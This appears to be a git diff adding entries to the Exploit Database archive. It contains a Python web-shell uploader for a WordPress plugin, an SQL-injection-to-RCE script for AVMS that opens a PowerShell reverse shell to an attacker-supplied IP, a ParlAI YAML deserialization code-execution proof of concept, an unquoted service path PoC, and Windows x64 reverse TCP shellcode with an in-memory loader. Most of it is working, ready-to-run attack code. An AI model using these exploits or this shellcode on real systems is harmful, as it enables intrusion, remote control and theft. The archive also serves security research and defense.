+1,75 @@ +# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/download-from-files +# Date: 10/09/2021 +# Exploit Author: spacehen +# Vendor Homepage: https://wordpress.org/plugins/download-from-files/ +# Version: <= 1.48 +# Tested on: Ubuntu 20.04.1 LTS (x86) + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("Download From Files <= 1.48 - Arbitrary File Upload") + print("Author -> spacehen (www.github.com/spacehen)") + +def print_usage(): + print("Usage: python3 exploit.py [target url] [php file]") + print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") + +def vuln_check(uri): + response = requests.get(uri) + raw = response.text + + if ("Sikeres" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 3): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + file_path = sys.argv[2] + + ajax_action = 'download_from_files_617_fileupload' + admin = '/wp-admin/admin-ajax.php'; + + uri = base + admin + '?action=' + ajax_action ; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + if( path.isfile(file_path) == False): + print("(*) Invalid file!") + sys.exit(1) + + files = {'files[]' : open(file_path)} + data = { + "allowExt" : "php4,phtml", + "filesName" : "files", + "maxSize" : "1000", + "uploadDir" : "." + } + print("Uploading Shell..."); + response = requests.post(uri, files=files, data=data ) + file_name = path.basename(file_path) + if("ok" in response.text): + print("Shell Uploaded!") + if(base[-1] != '/'): + base += '/' + print(base + "wp-admin/" + file_name); + else: + print("Shell Upload Failed") + sys.exit(1) + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/50288.py b/exploits/php/webapps/50288.py new file mode 100755 index 000000000..8844b0460 --- /dev/null +++ b/exploits/php/webapps/50288.py @@ -0,0 +1,77 @@ +# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE +# Date: 2021-08-13 +# Exploit Author: mari0x00 +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: 1.0 +# Tested on: Windows 10 + XAMPP + +#!/usr/bin/python3 + +import requests, socket, threading +import base64, time, sys + +print(('''###########################################################''',"red")) +print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) +print(('''###########################################################''',"red")) +print("") + +URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' +path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' +path = path.replace("\\", "\\\\") +rhost = input("Provide attacker IP: ") or "127.0.0.1" +rport = input("Provide attacker listening port: ") or "1337" + + +# sending webshell +payload = {"username": "admin' union select '' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} +requests.post(URL, data=payload) + + +def shell(rhost, rport): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.bind((rhost, int(rport))) + except socket.error as msg: + print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1]) + sys.exit() + + s.settimeout(5) + s.listen(5) + print('[+] Waiting for connection..') + + conn = False + command='' + + while conn == False: + try: + conn, addr = s.accept() + print("Got a connection from " + addr[0] + ":" + str(addr[1])) + conn.send('\n'.encode()) + time.sleep(1) + print(conn.recv(0x10000).decode()) + while(command != 'exit'): + command=input('') + conn.send((command + '\n').encode()) + time.sleep(.3) + res = conn.recv(0x10000) + print(res.decode()) + s.close() + sys.exit("[!] Program exited") + except socket.timeout: + pass + + +def start_shell(rhost, rport): + revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" + revshell = revshell.encode('ascii') + revshell = base64.b64encode(revshell) + revshell = revshell.decode('ascii') + connection = requests.get(URL+"/lol.php?cmd=" + revshell) + +print("[+] Starting to listen on port " + rport) +time.sleep(0.5) +threading.Thread(target=shell, args=(rhost, rport)).start() +time.sleep(2) +print("[+] Sending the reverse shell payload") +threading.Thread(target=start_shell, args=(rhost, rport)).start() \ No newline at end of file diff --git a/exploits/python/local/50289.py b/exploits/python/local/50289.py new file mode 100755 index 000000000..00cc541e3 --- /dev/null +++ b/exploits/python/local/50289.py @@ -0,0 +1,49 @@ +# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai +# Date: 2021-09-11 +# Exploit Author: Abhiram V +# Vendor Homepage: https://parl.ai/ +# Software Link: https://github.com/facebookresearch/ParlAI +# Version: < 1.1.0 +# Tested on: Linux +# CVE: CVE-2021-24040 +# References : +# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg +# | https://anon-artist.github.io/blogs/blog3.html | + +############################################################################ + +Introduction +ParlAI (pronounced “par-lay”) is a free, open-source python framework for +sharing, training and evaluating AI models on a variety of openly available +dialogue datasets. + +############################################################################ + +Vulnerability details + +############################################################################ + +Description +ParlAI was vulnerable to YAML deserialization attack caused by unsafe +loading which leads to Arbitrary Code Execution. + +Proof of Concept + +Create the following PoC file (exploit.py) + +import os +#os.system('pip3 install parlai') +from parlai.chat_service.utils import config +exploit = """!!python/object/new:type + args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] + listitems: "__import__('os').system('xcalc')" +""" +open('config.yml','w+').write(exploit) +config.parse_configuration_file('config.yml') + +Execute the python script ie, python3 exploit.py + +Impact +Code Execution + +############################################################################ \ No newline at end of file diff --git a/exploits/windows/local/50273.txt b/exploits/windows/local/50273.txt new file mode 100644 index 000000000..606c2c334 --- /dev/null +++ b/exploits/windows/local/50273.txt @@ -0,0 +1,28 @@ +# Exploit Title: Active WebCam 11.5 - Unquoted Service Path +# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) +# Date: 09.09.2021 +# Software Link: https://www.techspot.com/downloads/175-active-webcam.html +# Vendor Homepage: https://www.pysoft.com/ +# Version: 11.5 +# Tested on: Windows 10 + +# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options + +# Proof of Concept: + +C:\Users\death>sc qc ACTIVEWEBCAM +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ACTIVEWEBCAM + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Active WebCam + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ +Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a909c6204..3e7584ca7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11385,6 +11385,9 @@ id,file,description,date,author,type,platform,port 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, +50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, +50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware, +50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18528,6 +18531,7 @@ id,file,description,date,author,type,platform,port 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",1970-01-01,"Ivan Nikolsky",remote,hardware, 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java, 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux, +50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44394,3 +44398,16 @@ id,file,description,date,author,type,platform,port 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, 50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php, 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php, +50274,exploits/php/webapps/50274.txt,"Men Salon Management System 1.0 - Multiple Vulnerabilities",1970-01-01,"Aryan Chehreghani",webapps,php, +50275,exploits/hardware/webapps/50275.txt,"ECOA Building Automation System - Weak Default Credentials",1970-01-01,Neurogenesia,webapps,hardware, +50276,exploits/hardware/webapps/50276.txt,"ECOA Building Automation System - Path Traversal Arbitrary File Upload",1970-01-01,Neurogenesia,webapps,hardware, +50277,exploits/hardware/webapps/50277.txt,"ECOA Building Automation System - Directory Traversal Content Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50278,exploits/hardware/webapps/50278.txt,"ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,Neurogenesia,webapps,hardware, +50279,exploits/hardware/webapps/50279.txt,"ECOA Building Automation System - Cookie Poisoning Authentication Bypass",1970-01-01,Neurogenesia,webapps,hardware, +50280,exploits/hardware/webapps/50280.txt,"ECOA Building Automation System - Configuration Download Information Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50281,exploits/hardware/webapps/50281.txt,"ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function",1970-01-01,Neurogenesia,webapps,hardware, +50284,exploits/hardware/webapps/50284.txt,"ECOA Building Automation System - Remote Privilege Escalation",1970-01-01,Neurogenesia,webapps,hardware, +50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware, +50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware, +50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b6ab0173b..5d6d1105b 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1041,3 +1041,4 @@ id,file,description,date,author,type,platform 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 +50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c new file mode 100644 index 000000000..16f87a8c9 --- /dev/null +++ b/shellcodes/windows_x86-64/50291.c @@ -0,0 +1,290 @@ +# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) +# Date: 09.12.2021 +# Author: Xenofon Vassilakopoulos +# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043 + +/* + +MIT License + +Copyright (c) 2021 Xenofon Vassilakopoulos + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +[BITS 32] + +global _start + +section .text + +_start: + +; Locate Kernelbase.dll address +XOR ECX, ECX ;zero out ECX +MOV EAX, FS:[ecx + 0x30] ;EAX = PEB +MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr +MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList +LODSD ;memory address of the second list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the third list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the fourth list entry structure +MOV EBX, [EAX + 0x10] ;EBX = Base address + +; Export Table +MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew +ADD EDX, EBX ;EDX = PE Header +MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table +ADD EDX, EBX ;EDX = Export table +MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table +ADD ESI, EBX ;ESI = Names table +XOR ECX, ECX ;EXC = 0 + +GetFunction : + +INC ECX; increment counter +LODSD ;Get name offset +ADD EAX, EBX ;Get function name +CMP dword [EAX], 0x50746547 ;"PteG" +JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP" +CMP dword [EAX + 0x4], 0x41636F72 ;"rocA" +JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA" +CMP dword [EAX + 0x8], 0x65726464 ;"ddre" +JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre" + +MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals +ADD ESI, EBX ;ESI = Ordinals table +MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function +DEC ECX ;Decrement the ordinal +MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table +ADD ESI, EBX ;ESI = Address table +MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset) +ADD EDX, EBX ;EDX = GetProcAddress + +; Get the Address of LoadLibraryA function +XOR ECX, ECX ;ECX = 0 +PUSH EBX ;Kernel32 base address +PUSH EDX ;GetProcAddress +PUSH ECX ;0 +PUSH 0x41797261 ;"Ayra" +PUSH 0x7262694C ;"rbiL" +PUSH 0x64616F4C ;"daoL" +PUSH ESP ;"LoadLibrary" +PUSH EBX ;Kernel32 base address +MOV ESI, EBX ;save the kernel32 address in esi for later +CALL EDX ;GetProcAddress(LoadLibraryA) + +ADD ESP, 0xC ;pop "LoadLibraryA" +POP EDX ;EDX = 0 +PUSH EAX ;EAX = LoadLibraryA +PUSH EDX ;ECX = 0 +MOV DX, 0x6C6C ;"ll" +PUSH EDX +PUSH 0x642E3233 ;"d.23" +PUSH 0x5F327377 ;"_2sw" +PUSH ESP ;"ws2_32.dll" +CALL EAX ;LoadLibrary("ws2_32.dll") + +ADD ESP, 0x10 ;Clean stack +MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress +PUSH 0x61617075 ;"aapu" +SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa") +PUSH 0x74726174 ;"trat" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSAStartup" +PUSH EAX ;ws2_32.dll address +MOV EDI, EAX ;save ws2_32.dll to use it later +CALL EDX ;GetProcAddress(WSAStartup) + +; Call WSAStartUp +XOR EBX, EBX ;zero out ebx register +MOV BX, 0x0190 ;EAX = sizeof(struct WSAData) +SUB ESP, EBX ;allocate space for the WSAData structure +PUSH ESP ;push a pointer to WSAData structure +PUSH EBX ;Push EBX as wVersionRequested +CALL EAX ;Call WSAStartUp + +;Find the address of WSASocketA +ADD ESP, 0x10 ;Align the stack +XOR EBX, EBX ;zero out the EBX register +ADD BL, 0x4 ;add 0x4 at the lower register BL +IMUL EBX, 0x64 ;EBX = 0x190 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614174 ;"aaAt" +SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa") +PUSH 0x656b636f ;"ekco" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument +MOV EAX, EDI ;EAX now holds the ws2_32.dll address +PUSH EAX ;push the first argument of GetProcAddress +CALL EDX ;call GetProcAddress +PUSH EDI ;save the ws2_32.dll address to use it later + +;call WSASocketA +XOR ECX, ECX ;zero out ECX register +PUSH EDX ;null value for dwFlags argument +PUSH EDX ;zero value since we dont have an existing socket group +PUSH EDX ;null value for lpProtocolInfo +MOV DL, 0x6 ;IPPROTO_TCP +PUSH EDX ;set the protocol argument +INC ECX ;SOCK_STREAM(TCP) +PUSH ECX ;set the type argument +INC ECX ;AF_INET(IPv4) +PUSH ECX ;set the ddress family specification argument +CALL EAX ;call WSASocketA +XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later + +;Find the address of connect +POP EDI ;load previously saved ws2_32.dll address to ECX +ADD ESP, 0x10 ;Align stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x63 ;EBX = 0x18c +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61746365 ;"atce" +SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a") +PUSH 0x6e6e6f63 ;"nnoc" +PUSH ESP ;"connect", second argument of GetProcAddress +PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress +XCHG ECX, EBP +CALL EDX ;call GetProcAddress + +;call connect +PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11 +PUSH word 0x5c11 ;port = 4444 +XOR EBX, EBX ;zero out EBX +add BL, 0x2 ;TCP protocol +PUSH word BX ;push the protocol value on the stack +MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol) +PUSH byte 16 ;the size of sockaddr - 3rd argument of connect +PUSH EDX ;push the sockaddr - 2nd argument of connect +PUSH EBP ;socket descriptor = 64 - 1st argument of connect +XCHG EBP, EDI +CALL EAX ;execute connect; + +;Find the address of CreateProcessA +ADD ESP, 0x14 ;Clean stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x62 ;EBX = 0x194 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614173 ;"aaAs" +SUB dword [ESP + 0x2], 0x6161 ;"As" +PUSH 0x7365636f ;"seco" +PUSH 0x72506574 ;"rPet" +PUSH 0x61657243 ;"aerC" +PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress +MOV EBP, ESI ;move the kernel32.dll to EBP +PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress +CALL EDX ;execute GetProcAddress +PUSH EAX ;address of CreateProcessA +LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA + +;call CreateProcessA +PUSH 0x61646d63 ;"admc" +SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a) +MOV ECX, ESP ;ecx now points to "cmd" string +XOR EDX, EDX ;zero out EDX +SUB ESP, 16 +MOV EBX, esp ;pointer for ProcessInfo + +;STARTUPINFOA struct +PUSH EDI ;hStdError => saved socket +PUSH EDI ;hStdOutput => saved socket +PUSH EDI ;hStdInput => saved socket +PUSH EDX ;lpReserved2 => NULL +PUSH EDX ;cbReserved2 => NULL +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +ROL EAX, 8 ;EAX => 0x00000100 +PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100 +PUSH EDX ;dwFillAttribute => NULL +PUSH EDX ;dwYCountChars => NULL +PUSH EDX ;dwXCountChars => NULL +PUSH EDX ;dwYSize => NULL +PUSH EDX ;dwXSize => NULL +PUSH EDX ;dwY => NULL +PUSH EDX ;dwX => NULL +PUSH EDX ;pTitle => NULL +PUSH EDX ;pDesktop => NULL +PUSH EDX ;pReserved => NULL +XOR EAX, EAX ;zero out EAX +ADD AL, 44 ;cb => 0x44 (size of struct) +PUSH EAX ;eax points to STARTUPINFOA + +;ProcessInfo struct +MOV EAX, ESP ;pStartupInfo +PUSH EBX ;pProcessInfo +PUSH EAX ;pStartupInfo +PUSH EDX ;CurrentDirectory => NULL +PUSH EDX ;pEnvironment => NULL +PUSH EDX ;CreationFlags => 0 +XOR EAX, EAX ;zero out EAX register +INC EAX ;EAX => 0x00000001 +PUSH EAX ;InheritHandles => TRUE => 1 +PUSH EDX ;pThreadAttributes => NULL +PUSH EDX ;pProcessAttributes => NULL +PUSH ECX ;pCommandLine => pointer to "cmd" +PUSH EDX ;ApplicationName => NULL +CALL EBP ;execute CreateProcessA + +*/ + +#include +#include +#include + +char code[] = +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b" +"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31" +"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f" +"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde" +"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53" +"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54" +"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33" +"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04" +"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68" +"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc" +"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c" +"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68" +"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06" +"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b" +"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63" +"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c" +"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83" +"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61" +"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72" +"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64" +"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57" +"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52" +"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50" +"\x52\x52\x51\x52\xff\xd5"; + +int main(int argc, char** argv) +{ + //HWND hWnd = GetConsoleWindow(); + //ShowWindow(hWnd, SW_HIDE); + printf("Shellcode Length: %d\n", strlen(code)); + void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(exec, code, sizeof(code)); + ((void(*)())exec)(); + + return 0; +} \ No newline at end of file